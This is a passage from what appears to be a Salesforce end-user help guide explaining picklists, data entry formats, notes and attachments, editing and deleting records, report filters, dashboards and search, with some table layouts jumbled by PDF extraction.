In Salesforce, you may encounter a few different types of picklist fields.

• Standard picklists - Click the down arrow to select a single value.

• Multi-select picklists - Double click on any available value in one scrolling box to add that value to the selected scrolling
box on the right. You can choose a single value or multiple values. To select values within a range, select the first value and
click the last value in the range while holding down the SHIFT key; then, click the arrow to add selections to the chosen
box.

• Dependent and controlling picklists work in conjunction with each other. The value chosen in the controlling picklist
affects the values available in its dependent picklist. Both controlling and dependent picklists are indicated on edit pages

by an  icon. Hover your mouse over the icon to display the name of the controlling or dependent picklist.

Guidelines for Entering Currency, Dates, Times, and Phone
Numbers

Available in: All Editions except Database.com

Creating and editing records is easier if you understand a few guidelines and tips for the currency, date, time, and phone
number fields you’ll find in various records.

Currency

In most Salesforce editions, the format and currency type you can use for currency fields, such as Quota or Annual Revenue,
are determined by the Currency Locale setting for your company. In Group, Professional, Enterprise, and Unlimited
Edition organizations that use multiple currencies, the format and currency type are determined by the Currency field in the
record you’re creating or editing.

Tip:  When you enter a monetary amount (or any other type of number), you can use the shortcuts k, m, or b to
indicate thousands, millions, or billions. For example, when you enter 50k it appears as 50,000. However, these
shortcuts do not work for filter criteria.
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Dates and Times

Many fields allow you to enter a date or a time in the format specified by your personal Locale setting.

When entering dates, you can choose a date from the calendar, or manually enter a date.

Only dates within a certain range are valid. The earliest valid date is 1700-01-01T00:00:00Z GMT, or just after midnight on
January 1, 1700. The latest valid date is 4000-12-31T00:00:00Z GMT, or just after midnight on December 31, 4000. These
values are offset by your time zone. For example, in the Pacific time zone, the earliest valid date is 1699-12-31T16:00:00, or
4:00 PM on December 31, 1699.

Tip:

• Years appear and are saved as four digits, but you can enter the final two digits and Salesforce will determine the
first two. Entries 60 through 99 are assumed to be in the 20th century (for example: 1964), and entries 00 to
59 are assumed to be in the 21st century (for example: 2012).

• If you enter numbers for month and day only (example: 01/15), Salesforce supplies the current year.
• If your locale and language are English, you can enter words like Yesterday, Today, and Tomorrow, or any

day of the week, and Salesforce figures it out. Week day names (such as Monday) are always considered to be in
the following week.

Phone Numbers

When you enter phone numbers in various phone fields, Salesforce preserves whatever phone number format you enter.
However, if your Locale is set to English (United States) or English (Canada), ten-digit phone numbers and eleven-digit
numbers that start with “1” are automatically formatted as (800) 555-1212 when you save the record..

Tip:

• If you do not want the parentheses-space-hyphen formatting ((800) 555-1212) for a ten- or eleven-digit
number, enter a “+” before the number. For example: +49 8178 94 07-0.

• If your ten- and eleven-digit phone numbers have Salesforce’s automatic format, you may need to enter the
parentheses when specifying filter conditions. For example: Phone starts with (415).

Adding Notes to Records
Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, and Developer Editions

Enhance record information by adding notes. A note can contain up to 32 KB of data. If Spell Checker is enabled for your
organization, you can check the body (but not the title) of your note. Any note you add from a contact or opportunity record
will appear in the Notes and Attachments related list of that record, as well as in the related list for the account it is associated
with.

1. Click New Note in the Notes and Attachments related list of a record. Enter a title and body text.
2. If Spell Checker is enabled for your organization, click Check Spelling to check the spelling of the note.
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3. Click Save

See Also:
Attaching Files to Records
Viewing and Editing Google Docs, Notes, and Attachments
Deleting Notes and Attachments from Records

Attaching Files to Records
Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Edit” on the objectTo attach files to records:

You can attach files—such as Microsoft® Office documents, Adobe® PDFs, and images and videos—to most kinds of Salesforce
records. The size limit for an attached file is 5 MB when attached directly to the related list, including a file attached to a
solution.The size limit for all files attached to an email is 10 MB.

1. Open the record
2. Click Attach File.

3. Click Browse and find the file you want to attach
4. Click Attach File to upload the file.
5. Click Done when the upload is finished

Note:

• When a file is attached to a record’s Chatter feed it’s added to the Notes and Attachments related list as a feed
attachment. The file size limit for Chatter feed attachments is 2 GB.

• If the Disallow HTML documents and attachments security setting is enabled for your organization, you
cannot upload files with the following file extensions: .htm, .html, .htt, .htx, .mhtm, .mhtml, .shtm,
.shtml, .acgi.

Note and Attachment Fields
Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, and Developer Editions

Notes and attachments have the following fields, listed in alphabetical order.
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Attachment Fields

DescriptionField

Description of the uploaded file.Description

Name of the uploaded file.File Name

Checkbox to indicate that the attachment is only accessible
to the owner and administrators. For administrators to view

Private

private attachments, they need the “View All Data” permission;
to edit them, they need the “Modify All Data” permission.

Checkbox to indicate that the attachment is shared with
connections when the parent record is shared. This checkbox

Share With Connections

is only available if Salesforce to Salesforce is enabled, the parent
record is shared, and the attachment is public.

Size of the uploaded file.Size

Note Fields

DescriptionField

Text of the note. Can hold up to 32 KB of data.Body

Checkbox to indicate that note is only accessible to the owner
and administrators. For administrators to view private notes,

Private

they need the “View All Data” permission; to edit them, they
need the “Modify All Data” permission.

Short description of note. Up to 80 characters are allowed in
this field.

Title

Checking Your Spelling
Available in: All Editions

If Spell Checker is enabled for your organization, you can check your spelling in certain features where you enter text, such as
emails, events, tasks, cases, notes, and solutions. Spell Checker does not support all the languages that Salesforce supports.
For example, Spell Checker doesn’t support Thai, Russian, and double-byte languages, such as Japanese, Korean, or Chinese.

To check your spelling, just look for the Check Spelling button wherever you’re entering text.
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EDIT RECORDS

Editing Records
Available in: All Editions

User Permissions Needed

“Edit” on the object for the kind of record you’re editingTo edit records:

1. Make sure you’re aware of any guidelines for the kind of record you’re editing. The Salesforce help will tell you.
2. Find and open the record you want to edit.
3. Click Edit.
4. Enter or edit values in the fields. Required fields are identified with a red bar ( ).

Tip: Most objects have field definitions in the Salesforce help. Just search the help for the object name + “fields”.
For example, if you’re creating or editing an account record and want to know more about your options in the
Industry drop-down list, look up “Account Fields” in the help.

5. When you finish entering or editing values, click Save.

See Also:
Creating Records
Guidelines for Entering Currency, Dates, Times, and Phone Numbers
Editing Records Quickly with Inline Editing
Editing Records Directly From Enhanced Lists
Adding Notes to Records
Attaching Files to Records
Checking Your Spelling
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Changing a Record’s Record Type
Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Edit” on the objectTo change the record type for a record:

Record types determine the picklist values that are available when you create or edit a record. When creating a record, you can
choose the record type if you have different record types available and you have not set your record type preferences to bypass
the record type selection page.

1. Open the record.
2. Click Change next to the Record Type field on a record detail page.

Note:  For campaign members, click Change next to the Campaign Member Type field on a campaign detail
page. You must have the Marketing User user permission to change the campaign member type.

3. Select a record type. The available record types are listed at the bottom of the page.
4. Click Continue.
5. Click Save.

Note:

If your organization uses person accounts, your administrator has configured two different kinds of record types for
your organization's accounts: one for business accounts, and another for person accounts. You can change an account's
record type only to another record type of the same kind. For example, you cannot change a person account record
type to one designated for business accounts.

Editing Records Quickly with Inline Editing
Inline editing settings available in: All Editions except Database.com

User Permissions Needed

“Edit” on the objectTo use inline editing:

Inline editing lets users quickly edit field values, right on a record’s detail page.

To edit a record using inline editing:

1. Hover your mouse over the field you want to change:

•  indicates an editable field
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•  indicates a read-only field (such as Last Modified By)

2. Double-click the highlighted region next to the field. The field changes to edit mode. Salesforce displays compound fields
in a dialog box so that all portions of the field can be edited. Examples of compound fields include addresses, first and last
names, dependent picklists, and dependent lookups.

3. Enter the new value. Press Esc while your cursor is in a field's edit box to revert a change for that field.
4. Click away from the field to confirm your change and continue making edits. If you are editing a field that is not a text

area field, you can also press Enter to confirm your change. Confirmed changes display in bold orange text. To revert a

change, click  next to the field.
5. Press Enter again or click Save to commit all confirmed changes.

Important: Salesforce doesn't save confirmed changes to field values until you commit them by pressing the
Enter key a second time or clicking Save. Navigating away from the page without committing changes cancels
all edits made to the record.

Tips for Saving Inline Edits

• Press Enter while your cursor is in a field's edit box to confirm the change for that field.
• Press Enter when no fields are in edit mode to save all edits to the record.

Unsupported Behaviors

• Inline editing isn’t available in:

◊ Accessibility mode
◊ Setup pages
◊ Dashboards
◊ Customer Portal
◊ Descriptions for HTML solutions

• The following standard checkboxes on case and lead edit pages are not inline editable:

◊ Case Assignment (Assign using active assignment rules)
◊ Case Email Notification (Send notification email to contact)
◊ Lead Assignment (Assign using active assignment rule)

• The fields in the following standard objects are not inline editable.

◊ All fields in Documents and Pricebooks
◊ All fields in Tasks except for Subject and Comment
◊ All fields in Events except for Subject, Description, and Location
◊ Full name fields of Person Accounts, Contacts, and Leads. However, their component fields are, for example, First

Name and Last Name.

• You can use inline editing to change the values of fields on records for which you have read-only access, either via field-level
security or your organization's sharing model; however, Salesforce doesn't let you save your changes, and displays an
insufficient privileges error message when you try to save the record.

Special Cases

• Inline editing is available on detail pages for all editable fields on edit pages, except for some fields on tasks, events, price
books, and documents. To edit any of these, navigate to the edit page of a record, change the value of the field desired,
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and then click Save. The following table lists the objects that have inline editing restrictions on some of their fields. You
may need special permissions to view some of these fields:

FieldsObject

All fields are editable except long text area fields.All Objects

All fields are editable, except the following fields are only editable on detail pages (not
on list views):

Opportunities

◊ Amount

◊ Stage

◊ Forecast Category

◊ Quantity

All fields are editable, except Lead Status is only editable on detail pages (not on list
views).

Leads

All fields are editable, except Case Status is only editable on detail pages (not on list
views).

Cases

All fields are editable, except Contract Status is only editable on detail pages (not
on list views).

Contracts

Only the following fields are editable:Events
◊ Description

◊ Location

◊ Subject

◊ Type

◊ Custom fields

Only the following fields are editable:Tasks
◊ Call Type

◊ Description

◊ Subject

◊ Type

◊ Custom fields

No fields are editable.Documents

No fields are editable.Pricebooks
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Editing Records Directly From Enhanced Lists
Available in: All Editions except Database.com

User Permissions Needed

“Mass Edit from Lists”To use inline editing in an enhanced list:

If both inline editing and enhanced lists are enabled for your organization, you can edit records directly in a list. Editable cells
display a pencil icon ( ) when you hover over the cell, while non-editable cells display a lock icon ( ).

Warning:  In enhanced list views, when different users make inline edits to the same fields on a record simultaneously,
records are updated with the most recent edit, but we don’t identify the conflict with a message.

If you have the “Mass Edit from Lists” permission, you can change the value for a common field in up to 200 records at a time
for most kinds of records. Products must be edited one at a time.

To edit a single record from a list:

1. From the list, double-click the editable cell.
2. Enter the value you want.
3. Click OK.

To mass edit records from a list:.

1. Select the checkbox next to each record you want to edit. You can select records on multiple pages.
2. Double-click one of the cells you want to edit. Apply your edit to just one record or to every record you selected.

If you encounter any errors when trying to update records, a console window appears, showing the name of each record in
error (if known), as well as an explanation. Click a record in the console window to open its detail page in a new window.

Note: To view the error console, you must have pop-up blockers disabled for the Salesforce domain.

Tips for Using Inline Editing with Lists

Note the following tips when using inline editing with lists:

• Some standard fields do not support inline editing. For example, Case Status, Opportunity Stage, Opportunity
Amount, Opportunity Quantity and Lead Status, and most Task and Event fields can only be edited from a
record's edit page. For more information, see Editing Records Quickly with Inline Editing on page 73.

• If your organization uses record types, inline editing with lists is only available when all of the records in the list are of the
same record type. Therefore, you must specify a filter of Record Type equals X, where X is the name of a single
record type (or blank for the master record type).

• To perform inline editing on an enhanced list, filter logic must be turned off in the list view filter criteria.
• For lists of activities, you must specify an additional filter of either Task equals True (for tasks) or Task equals

False (for events) for inline editing to be available.
• If your organization is using Person Accounts:
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◊ You can't use inline editing to change them from a Contact list. You can only inline edit Person Accounts from an
Account list.\

◊ You can only use inline editing on contacts associated to business accounts by specifying an additional filter of Is
Person Account EQUALS False in your list criteria.

DELETE RECORDS

Deleting Records
Available in: All Editions

User Permissions Needed

“Delete” on the object for the kind of record you’re deletingTo delete records:

Deleting records is standard procedure for mostSalesforce users. When you delete a record, it’s moved the to Recycle Bin,
which you can empty.

For some kinds of objects, deleting one record affects other, related records. For example, if you delete an account or contact,
all associated assets are also deleted.

1. Make sure you’re aware of the effects (if any) of deleting the kind of record you want to delete. The Salesforce help will
tell you.

2. Find and open the record you want to delete.
3. Click Delete.

The record is moved to the Recycle Bin. Empty the Recycle Bin to complete the deletion process.

Tip:  If you delete a record by mistake, you can “undelete” it from the Recycle Bin. Good as new!

See Also:
Using the Recycle Bin
Deleting Notes and Attachments from Records
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Deleting Notes and Attachments from Records
Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, and Developer Editions

To delete a note or attachment, click Del next to the note or attachment in the Notes and Attachments related list or
Attachments related list of a record. Deleted notes and attachments can be restored from the Recycle Bin.

To delete a file that was attached from a Chatter feed, click Del next to the feed attachment. This removes the file from all
Chatter feeds where it’s been shared and deletes the file from the Notes and Attachments related list. Restore the file by
clicking on the Recycle Bin, selecting the file, and clicking Undelete. If the file was attached from your computer, a Chatter
feed, group, or a Salesforce CRM Content library, deleting it from the Notes and Attachments related list also removes it
from the post, but doesn’t delete it from its original location.

See Also:
Viewing and Editing Google Docs, Notes, and Attachments

RECORDS FAQ

What formats should I use for dates, times, and names in
Salesforce?

The format used for dates, times, and names of people in Salesforce is determined by your Locale setting.

To find out what date/time format your Locale setting uses:

1. At the top of any Salesforce page, click the down arrow next to your name. From the menu under your name, select Setup
or My Settings—whichever one appears.

2. From the left pane, select one of the following:

• If you clicked Setup, select My Personal Information > Personal Information.
• If you clicked My Settings, select Personal > Advanced User Detail.

3. View the date/time format used in the read-only Created By field. This is the format you should use for entering dates
and times in Salesforce fields.

How do I allow only certain users to share data?
If your Professional, Enterprise, Unlimited, or Developer Edition organization has a Private or Public Read Only sharing
model, your administrator can still allow certain users to share information. Your administrator can create public groups and
then set up sharing rules to specify that users in certain roles or groups will always share their data with users in another role
or public group. Individual users can also create personal groups to give access to their own accounts, contacts, and opportunities.
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Can an individual user control the sharing of records they
own?

Yes. In Professional, Enterprise, Unlimited, and Developer Edition organizations, all account owners are empowered to further
extend the sharing on an account-by-account basis. For example, if the organization has a Private model, the Acme account
owner can share this account and its related data to selected groups, or to individual users.

In Enterprise, Unlimited, and Developer Editions, opportunity owners can also extend the sharing for individual opportunities
separately from account sharing.

You can use account, lead, case, and opportunity sharing to increase access to your data; you cannot restrict access beyond your
organization’s default access levels.

This type of sharing is called manual sharing, and is done by the Sharing button on the record detail page.

Can I transfer records to other users?
Yes, in Contact Manager, Group, Professional, Enterprise, Unlimited, and Developer Editions, you can transfer records you
own.

If you’re an administrator, you can transfer ownership of all leads or accounts and related data from one user to another. From
Setup, click Data Management  > Mass Transfer Records.

How do I print Salesforce records?
To print the details of a Salesforce record:

1. Click the Printable View link located in the upper right corner of most detail pages. A new browser window opens with
the record displayed in a simple, print-ready format.

2. Optionally, collapse and expand individual sections in the printable view by clicking the triangles next to the section
headings.

3. Optionally, click Expand All or Collapse All to show or hide all of the collapsible sections on the page. Related lists, such
as the list of opportunities related to an account, are not collapsible.

4. Click Print This Page or use your browser's print function to send the page to a printer.

Note:  On the Console tab, you can click the print icon ( ) to open a record's printable view.
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MONITOR AND ANALYZE YOUR DATA

Run a Report
To run a report, find it on the Reports tab and click the report name. Most reports run automatically when you click the name.
If you’re already viewing a report, click Run Report to run it immediately or schedule a future run.

Available in: All editions except Database.com

User Permissions Needed

“Run Reports”To run reports:

“Schedule Reports”To schedule reports:

“Create and Customize Reports”

AND

“Report Builder”

To create, edit, and delete reports:

If you don’t see any results, check the report for one of these conditions:

• The report didn’t return any data. Check your filter criteria to make sure some data is returned.
• Due to field-level security, you don’t have access to one of the groupings you selected.
• Your custom summary formula’s context didn’t match the chart settings. For example, if the formula is calculated for

Industry, but the chart doesn’t include Industry, no results are returned.
• Your values are out of the range of acceptable values. The maximum value allowed is 999999999999999. The minimum

value allowed is -99999999999999.

If your report returns more than 2,000 records, only the first 2,000 records are displayed. To see a complete view of your report
results, click Export Details.

If your report takes longer than 10 minutes to complete, Salesforce cancels the report. Try the following techniques to reduce
the amount of data in your report:

• Filter for your own records, rather than all records.
• Limit the scope of the data to a specific date range.
• Exclude unnecessary columns from your report.
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• Hide the report details.

See Also:
Get Started with Reports
Run a Joined Report
The Report Run Page
The Report Run Page
Report Run Page Options
Report Run Page Options
Print a Report
Sort Report Results

JOINED REPORTS

Run a Joined Report
Joined reports run in an updated version of the run reports page.

Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Run Reports”To run reports:

“Create and Customize Reports”

AND

“Report Builder”

To create, edit, and delete reports:

From the joined reports run page, you can:

• Click Run Report to run the report.

• Show or hide details

• Click Customize to open the report in report builder.

• Save or delete the report.

• Click Report Properties to change the report's name, description, or folder.
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• View the report generation status.

See Also:
Combine Different Types of Information in a Joined Report
Run a Report
How Joined Reports Work

Add Filter Logic
Filter logic lets you specify conditions for your filters using logical operators.

Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Create and Customize Reports”

AND

“Report Builder”

To create, edit, and delete reports:

“Read” on the type of record included in the listTo create custom list views:

“Manage Public List Views”To create, edit, or delete public list views:

To change the default AND relationship between each filter:

1. Click Add > Filter Logic.
2. Enter each filter line number, separated by an operator:

DefinitionOperator

Finds records that match both values.AND

Finds records that match either value.OR

Finds records that exclude values.NOT

See Also:
Filter Your Report Data
Filter Operators
Filter on Blank Values
Filtering on Special Picklist Values
Build Effective Filters
Enter Filter Criteria
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Filter Operators
The operator in a filter is like the verb in a sentence. When you choose filter criteria, use an operator to specify the action you
want the filter to take.

You can use the following operators when entering filter criteria on list views, reports, dashboards, and some custom fields:

UsesOperator

Use for an exact match; for example, “Created equals today.”equals

Use for results that are less than the value you enter; for example, “Quota less than 20k”
returns records where the quota field ranges from 0 to 19,999.99.

less than

Use when you want results that exceed the value you enter; for example, “Quota greater
than 20k” returns records where the quota amount begins at 20,000.01.

greater than

Use for results that match or are less than the value you enter.less or equal

Use for results that match or exceed the value you enter.greater or equal

Shows results that don’t have the value you enter. This is especially useful for eliminating
empty fields; for example, “Email not equal to <blank>.”

not equal to

Use for fields that include your search string but might also include other information.
For example, “Account contains california” would find California Travel, California Pro

contains

Shop, and Surf California. Keep in mind that if you enter a short search string, it may
match on a longer word. For example, “Account contains pro” would find California Pro
Shop and Promotions Corporation.

Eliminates records that do not contain the value you enter; for example, “Mailing Address
Line 2 does not contain P. O. Box.”

does not contain

Note:  When specifying filter criteria on roll-up summary fields, does not
contain uses “or” logic on comma-separated values. On list views, reports, and
dashboards, does not contain uses “and” logic.

Use when you know what your value starts with, but not the exact text. This is a narrower
search term than “contains.” For example, if you enter “Account starts with california”
you would find California Travel and California Pro Shop, but not Surf California.

starts with

Available when you choose a multi-select picklist as the selected field. Use this operator
to find records that include one or more of the values you enter.

For example, if you enter “Interests includes hockey, football, baseball” you would find
records that only have hockey selected as well as those that have two or three of the values
entered. Results do not include partial matches of values.

includes
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UsesOperator

Available when you choose a multi-select picklist as the selected field. Use this operator
to find records that do not contain any values that match the ones entered.

For example, if you enter “Interests exclude wine, golf” your report lists records that
contain any other values from that picklist, including those that are blank. Results do not
include partial matches of values.

excludes

Available for dashboard filters only. Use to filter on ranges of values. For each range, the
filter returns results that are greater than or equal to the minimum value and less than
the maximum value.

For example, if you enter “Number of Employees between 100 and 500,” your results
include accounts with 100 employees up to those with 499 employees. Accounts with
500 employees aren’t included in the results.

between

Available when you create list views based on a Geolocation custom field. Shows results
that are within the specified radius from a fixed latitude and longitude. For example, if

within

you enter “Warehouse location within 50 miles 37.775° –122.418°,” your list view includes
all warehouses within a 50–mile radius of San Francisco, California.

See Also:
Filter Your Report Data
Filter Your Report Data
Enter Filter Criteria

Filter on Blank Values
Tips on filtering using blank values.

Available in: All Editions

• When you use the “less than,” "greater than,” “less or equal,” or “greater or equal” operators on fields that have numeric
values, records with blank or “null” values are returned as if their value is zero (0). For example, if you create a workflow
rule or a lead assignment rule for accounts with the criteria Annual Revenue less than 100000, account records
match if their Annual Revenue is blank.

However, records with blank field values are not considered matches in report filters, custom list views, and account
assignment rules (which assign accounts to territories).

• To limit results to records that are blank or contain “null” values for a particular field, choose the field and the “equals” or
“not equal to” operators, leaving the third field blank. For example, Amount equals returns records with blank amount
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fields. You can search for blank values or other specified values at the same time. For example, Amount equals 1,,2
returns records where the Amount is blank or contains the value “1” or “2”.

See Also:
Filter Your Report Data
Build Effective Filters
Enter Filter Criteria

Filtering on Special Picklist Values
The available fields vary according to which Salesforce Edition you have.

When creating filter criteria, you can use special picklist values for your search criteria. These are special picklists with values
of either True or False.

For example, to show all opportunities you have won, enter Won equals True as your search criteria. To show all closed/lost
opportunities, enter Closed equals True and Won equals False.

Note: If you are creating filter criteria for a report or list view, the lookup icon automatically displays when you choose
to filter on one of the special picklists. Click the lookup icon to choose the value True or False. Alternatively, you
can manually enter True or False in the filter criteria.

These are the available fields and their values:

DescriptionValueSpecial Picklist Field

The account is a person account. Note that your
administrator may have customized the name of this field.

This field displays as the person account icon ( ).

TrueAccounts and contacts: Is Person
Account

The account is a business account.False

The account is a partner account, or the lead or opportunity
owner is a partner user.

TrueAccounts, leads, and opportunities:
Partner Account

The account is not a partner account or the lead or
opportunity owner is not a partner user.

False

Applies only to events, not tasks. The event is marked as an
all day event.

TrueActivities: All-day

The event has a specific time.False

Applies only to tasks, not events. The task has been closed,
that is, the task Status field has a “Closed” value.

TrueActivities: Closed

Task is still open.False

Applies only to events, not tasks. The event is the meeting
invite sent to another user for a multi-person event.

TrueActivities: Event Invitation
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DescriptionValueSpecial Picklist Field

(Only for reports) The event is the original multi-person event assigned to the
event host.

False

Activity does not have a green sheet.False

Activity is a task, not an event.TrueActivities: Task

Activity is an event.False

Campaign is active and can be chosen from various campaign
picklists, for example, in the campaign import wizards.

TrueCampaigns: Active

Campaign is inactive.False

The case is closed, that is, the case Status field has a
“Closed” value.

TrueCases: Closed

Case is still open.False

Case has been automatically escalated via your organization's
escalation rule.

TrueCases: Escalated

Case has not been escalated.False

Case has a new comment added by a Self-Service user.TrueCases: New Self-Service Comment

Case does not have a new Self-Service comment.False

The case is open, that is, the case Status has a value that
is not equivalent to “Closed.”

TrueCases: Open

(Only for reports)
Case has been closed.False

Case has a comment added by a Self-Service user.TrueCases: Self-Service Commented

Case does not have a Self-Service comment.False

The contact cannot be included in a mass email recipient
list.

TrueContacts: Email Opt Out

The contact may receive mass email.False

The contact is enabled to log in to your Self-Service portal.TrueContacts: Self-Service Active

(Only for reports) The contact is not enabled for Self-Service.False

The lead has been converted.TrueLeads: Converted

(Only for reports) The lead has not been converted.False

The lead cannot be included in a mass email recipient list.TrueLeads: Email Opt Out

The lead may receive mass email.False

The lead has not yet been viewed or edited by the owner
since it was assigned to that user.

TrueLeads: Unread

The lead has been viewed or edited at least once by the
owner since it was assigned.

False

86

Filtering on Special Picklist ValuesMonitor and Analyze Your Data



DescriptionValueSpecial Picklist Field

The opportunity is closed, that is, the Stage field has a
value of the type Closed/Won or Closed/Lost.

TrueOpportunities: Closed

The opportunity is still open.False

The partner for the opportunity has been marked as the
primary partner.

TrueOpportunities: Primary

(Only for Partner Opportunities report)
The partner for the opportunity has not been marked as the
primary partner.

False

The opportunity owner has checked the Private box on
the opportunity edit page.

TrueOpportunities: Private

The Private box on the opportunity is not checked.False

The opportunity is closed and won, that is, the Stage field
has a value of the type Closed/Won.

TrueOpportunities: Won

The opportunity has not been won. The Stage field may
have a value of the type Open or Closed/Lost.

False

Product is active and can be added to opportunities in
Enterprise and Unlimited Edition organizations.

TrueProducts: Active

Product is inactive and cannot be added to opportunities.False

Product has a default quantity schedule.TrueProduct: Has Quantity Schedule

Product does not have a default quantity schedule.False

Product has a default revenue schedule.TrueProduct: Has Revenue Schedule

Product does not have a default revenue schedule.False

The solution has been marked Visible in
Self-Service Portal and is visible to Self-Service portal
users.

TrueSolutions: Visible in
Self-Service Portal

Solution is not marked Visible in Self-Service
Portal and is not visible to Self-Service portal users.

False

The solution has been reviewed, that is, the solution Status
field has a “Reviewed” value.

TrueSolutions: Reviewed

Solution is not reviewed.False

The translated solution has not been updated to match the
master solution with which it is associated.

TrueSolutions Out of Date

The translated solution has been updated to match the
master solution with which it is associated.

False

User is active and can log in.TrueUsers: Active

User is inactive and cannot log in.False

User has access to use Connect Offline.TrueUsers: Offline User
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DescriptionValueSpecial Picklist Field

User is not enabled for Connect Offline use.False

User can manage campaigns.TrueUsers: Marketing User

User is not enabled to manage campaigns.False

User is a partner user.TrueUser: Is Partner

User is not a partner user.False

Note: The special picklists you can view are only those that are visible in your page layout and field-level security
settings.

Sort Report Results
Sort a report by the data in a particular column by clicking on that column's heading. Clicking a column header sorts data
according to that column’s ascending order: text is sorted from A to Z, numerical data is sorted from lowest to highest, and
time/date data is sorted from earliest to latest.

Available in: All editions except Database.com

User Permissions Needed

“Run Reports”To sort report results:

Tip:  You can also group and subtotal your data to create subsets of information.

• To reverse the sort order, click the column heading a second time.

• If the floating report header is enabled for your organization, sort behavior is slightly different.

Floating report headers keep the column headings on tabular reports in sight no matter how far users scroll down report
results. With floating report headers, users can scroll to the bottom of lengthy tabular reports without having to scroll back
to the top to view the names of the column headings. Users can also click floating report headers to sort data in a specific
column. When users sort data by clicking a floating report heading, the report refreshes and redirects users to the beginning
of report results.

See Also:
Get Started with Reports
Build a New Report
Subtotal Report Results
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Visualizing Data with Dashboards
A dashboard shows data from source reports as visual components, which can be charts, gauges, tables, metrics, or Visualforce
pages. The components provide a snapshot of key metrics and performance indicators for your organization. Each dashboard
can have up to 20 components.

Available in: Group, Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Run Reports” AND access to dashboard folderTo view and refresh dashboards:

“Run Reports” AND “Manage Dashboards”To create dashboards:

“Run Reports” AND “Manage Dashboards”To edit and delete dashboards you created:

“Run Reports,” “Manage Dashboards,” AND “View All Data”To edit and delete dashboards you didn’t create:

Clicking the Dashboards tab displays the dashboard you viewed most recently. The top of the page shows the time the
dashboard was refreshed last and the user whose permissions determine what data is visible on the dashboard.

Each component in a dashboard shows data from an underlying report. If you have access to the folder for the underlying
source report, you can see the related dashboard component. Click a dashboard component or its elements to drill down to
the source report, filtered report, record detail page, or other URL. If you drill down on a filtered component, the dashboard
filters are applied to the source report.

Click Go to Dashboard List to view your dashboards. Find a dashboard using dashboard finder. Type a name in the View
Dashboard field and choose a dashboard from the list of results. You can only see dashboards in folders you can access.

Follow a dashboard to get updates about the dashboard posted to your Chatter feed.
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FIND AND ORGANIZE INFORMATION

SEARCH

Search Overview
Available in: All Editions except Database.com

Note: Global search and feed search are automatically enabled when Chatter is enabled. However, enabling Chatter
disables sidebar search and advanced search.

Search for salesforce.com records and tags using:

Sidebar Search

From the sidebar search box you can search a subset of objects and fields. You can use wildcards and filters to refine your
search.

Advanced Search

Click Advanced Search... in the sidebar to search a subset of objects in combination and more fields than sidebar search,
including custom fields and long text fields such as descriptions, notes, and task and event comments. You can use
wildcards, operators, and filters to refine your search.

Global Search

From the header search box you can search more objects than sidebar search and advanced search, including articles,
documents, products, solutions, and Chatter feeds, files, groups, topics, and people. You can also search more fields than
sidebar search, including custom fields, and long text fields such as descriptions, notes, and task and event comments.
You can use wildcards, operators, and filters to refine your search. Global search keeps track of which objects you use
and how often you use them, and arranges the search results accordingly. Search results for the objects you use most
frequently appear at the top of the list.

Global search is not supported in a partner portal or Customer Portal.

Only users with supported browsers can use global search.

Contextual Feed Search

Global search is helpful when you want to look for information in feeds posts and comments across the organization.Use

feed search ( ) to find information in a feed in a specific context. Click  above the feed to look for information in
that feed. For example, use the feed search on a group’s page to find information in that group.You can search for
information in feeds on a user’s profile, a record, in a public or private group (if you’re a member), and on the Chatter
and Home tabs. A contextual feed search is helpful when you want to confirm or check if something was once discussed

90

Search OverviewFind and Organize Information



in that specific feed. You can search for hashtag topics, mentions, and files posted in the feed, or refine your search using
wildcards, operators, and quotation marks to match on exact phrases.

Other Search Utilities

Some objects have unique search utilities on their tabs. Global search results include these objects with the exception of Article
Management and Salesforce CRM Content. Neither sidebar search nor advanced search can find these objects; use the search
feature on the tab to find them.

• Solutions

• Documents

• Salesforce CRM Content

• Products

• Articles

• Article Management

Tip:  Your administrator can customize your Home tab to include the product, document, or solution search in the
sidebar.

See Also:
Tags Overview
Searching in Chatter

How Search Works
Search uses custom algorithms, including natural language analysis (NLA) techniques such as tokenization, stemming (articles
and files), and stopword lists, to return meaningful search results.

Available in: All Editions except Database.com

Tokenization breaks down all searchable text into smaller pieces at spaces, punctuation, and alphanumeric boundaries and
stores them in search indexes. When you perform a search, your results include matches on the tokens in your search term.
For example, a search for “web2lead” returns matches for “web”, “2”, and “lead”.

Stemming is the process of reducing a word to its root form. With stemming, search can match expanded forms of a search
term, as long as they are the same figure of speech. For example, a search for “run” matches “run”, “running”, and “ran”, but
not “runner”.

Stopword lists contain words that are ignored in search terms for each supported language (for example, “the”, “to”, and “for”).
These words are removed from the search and are not matched on to avoid irrelevant results.

Search further refines matches based on:

• Proximity and frequency of search terms in an item

• Any search options you specify

• Pinned items on your search results page
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• Item ownership

• Item popularity or importance determined by page views or the number of related lists

• Recent interaction with an item, for example if you view or edit a record

Two users performing the same search might have different search results, because searches are configured for the user
performing the search. For example, if you own or recently viewed an item, its relevancy increases and the item moves higher
in your search results.

How your search works depends on whether you're using sidebar, advanced, global search, or feed search.

See Also:
Search Overview

Searching in Salesforce.com
Available in: All Editions except Database.com

You can change search options before or after your search.

1. Enter your search terms in the sidebar or header search box.
2. Click Search (or Go! if you're using sidebar search).

Tips for Searching in Salesforce

• Your search term must have two or more characters. Special characters, such as " ? * ( ), aren't included in the character
count. For example, a search for (a) won't return any search results.

• Search isn't case-sensitive. For example, a search for california finds the same items as a search for California.
• Find phone numbers by entering part or all of a number. For example, to find (415) 999-3434, enter 4159993434, 999,

or 3434. To search for the last seven digits, you must enter the punctuation, such as 999-3434.
• In Chinese, Japanese, and Korean, you can find a person by entering last name before first name; searching for jones

bob returns any person named Bob Jones.
• If you're using advanced search or global search, refine your search using operators such as AND, OR, and AND NOT.
• If you're using advanced search or global search, search for exact phrases by putting quotation marks around multiple

keywords, for example, "call john smith" finds items with call john smith, but not items with call john p. smith or
john smith called. If you're using sidebar search, your search string is automatically treated as a phrase search.

• Search for partially matching terms using wildcards.

◊ Asterisks match zero or more characters at the middle or end (not the beginning) of your search term. For example, a
search for john* finds items that start with john, such as, john, johnson, or johnny. A search for mi* meyers finds
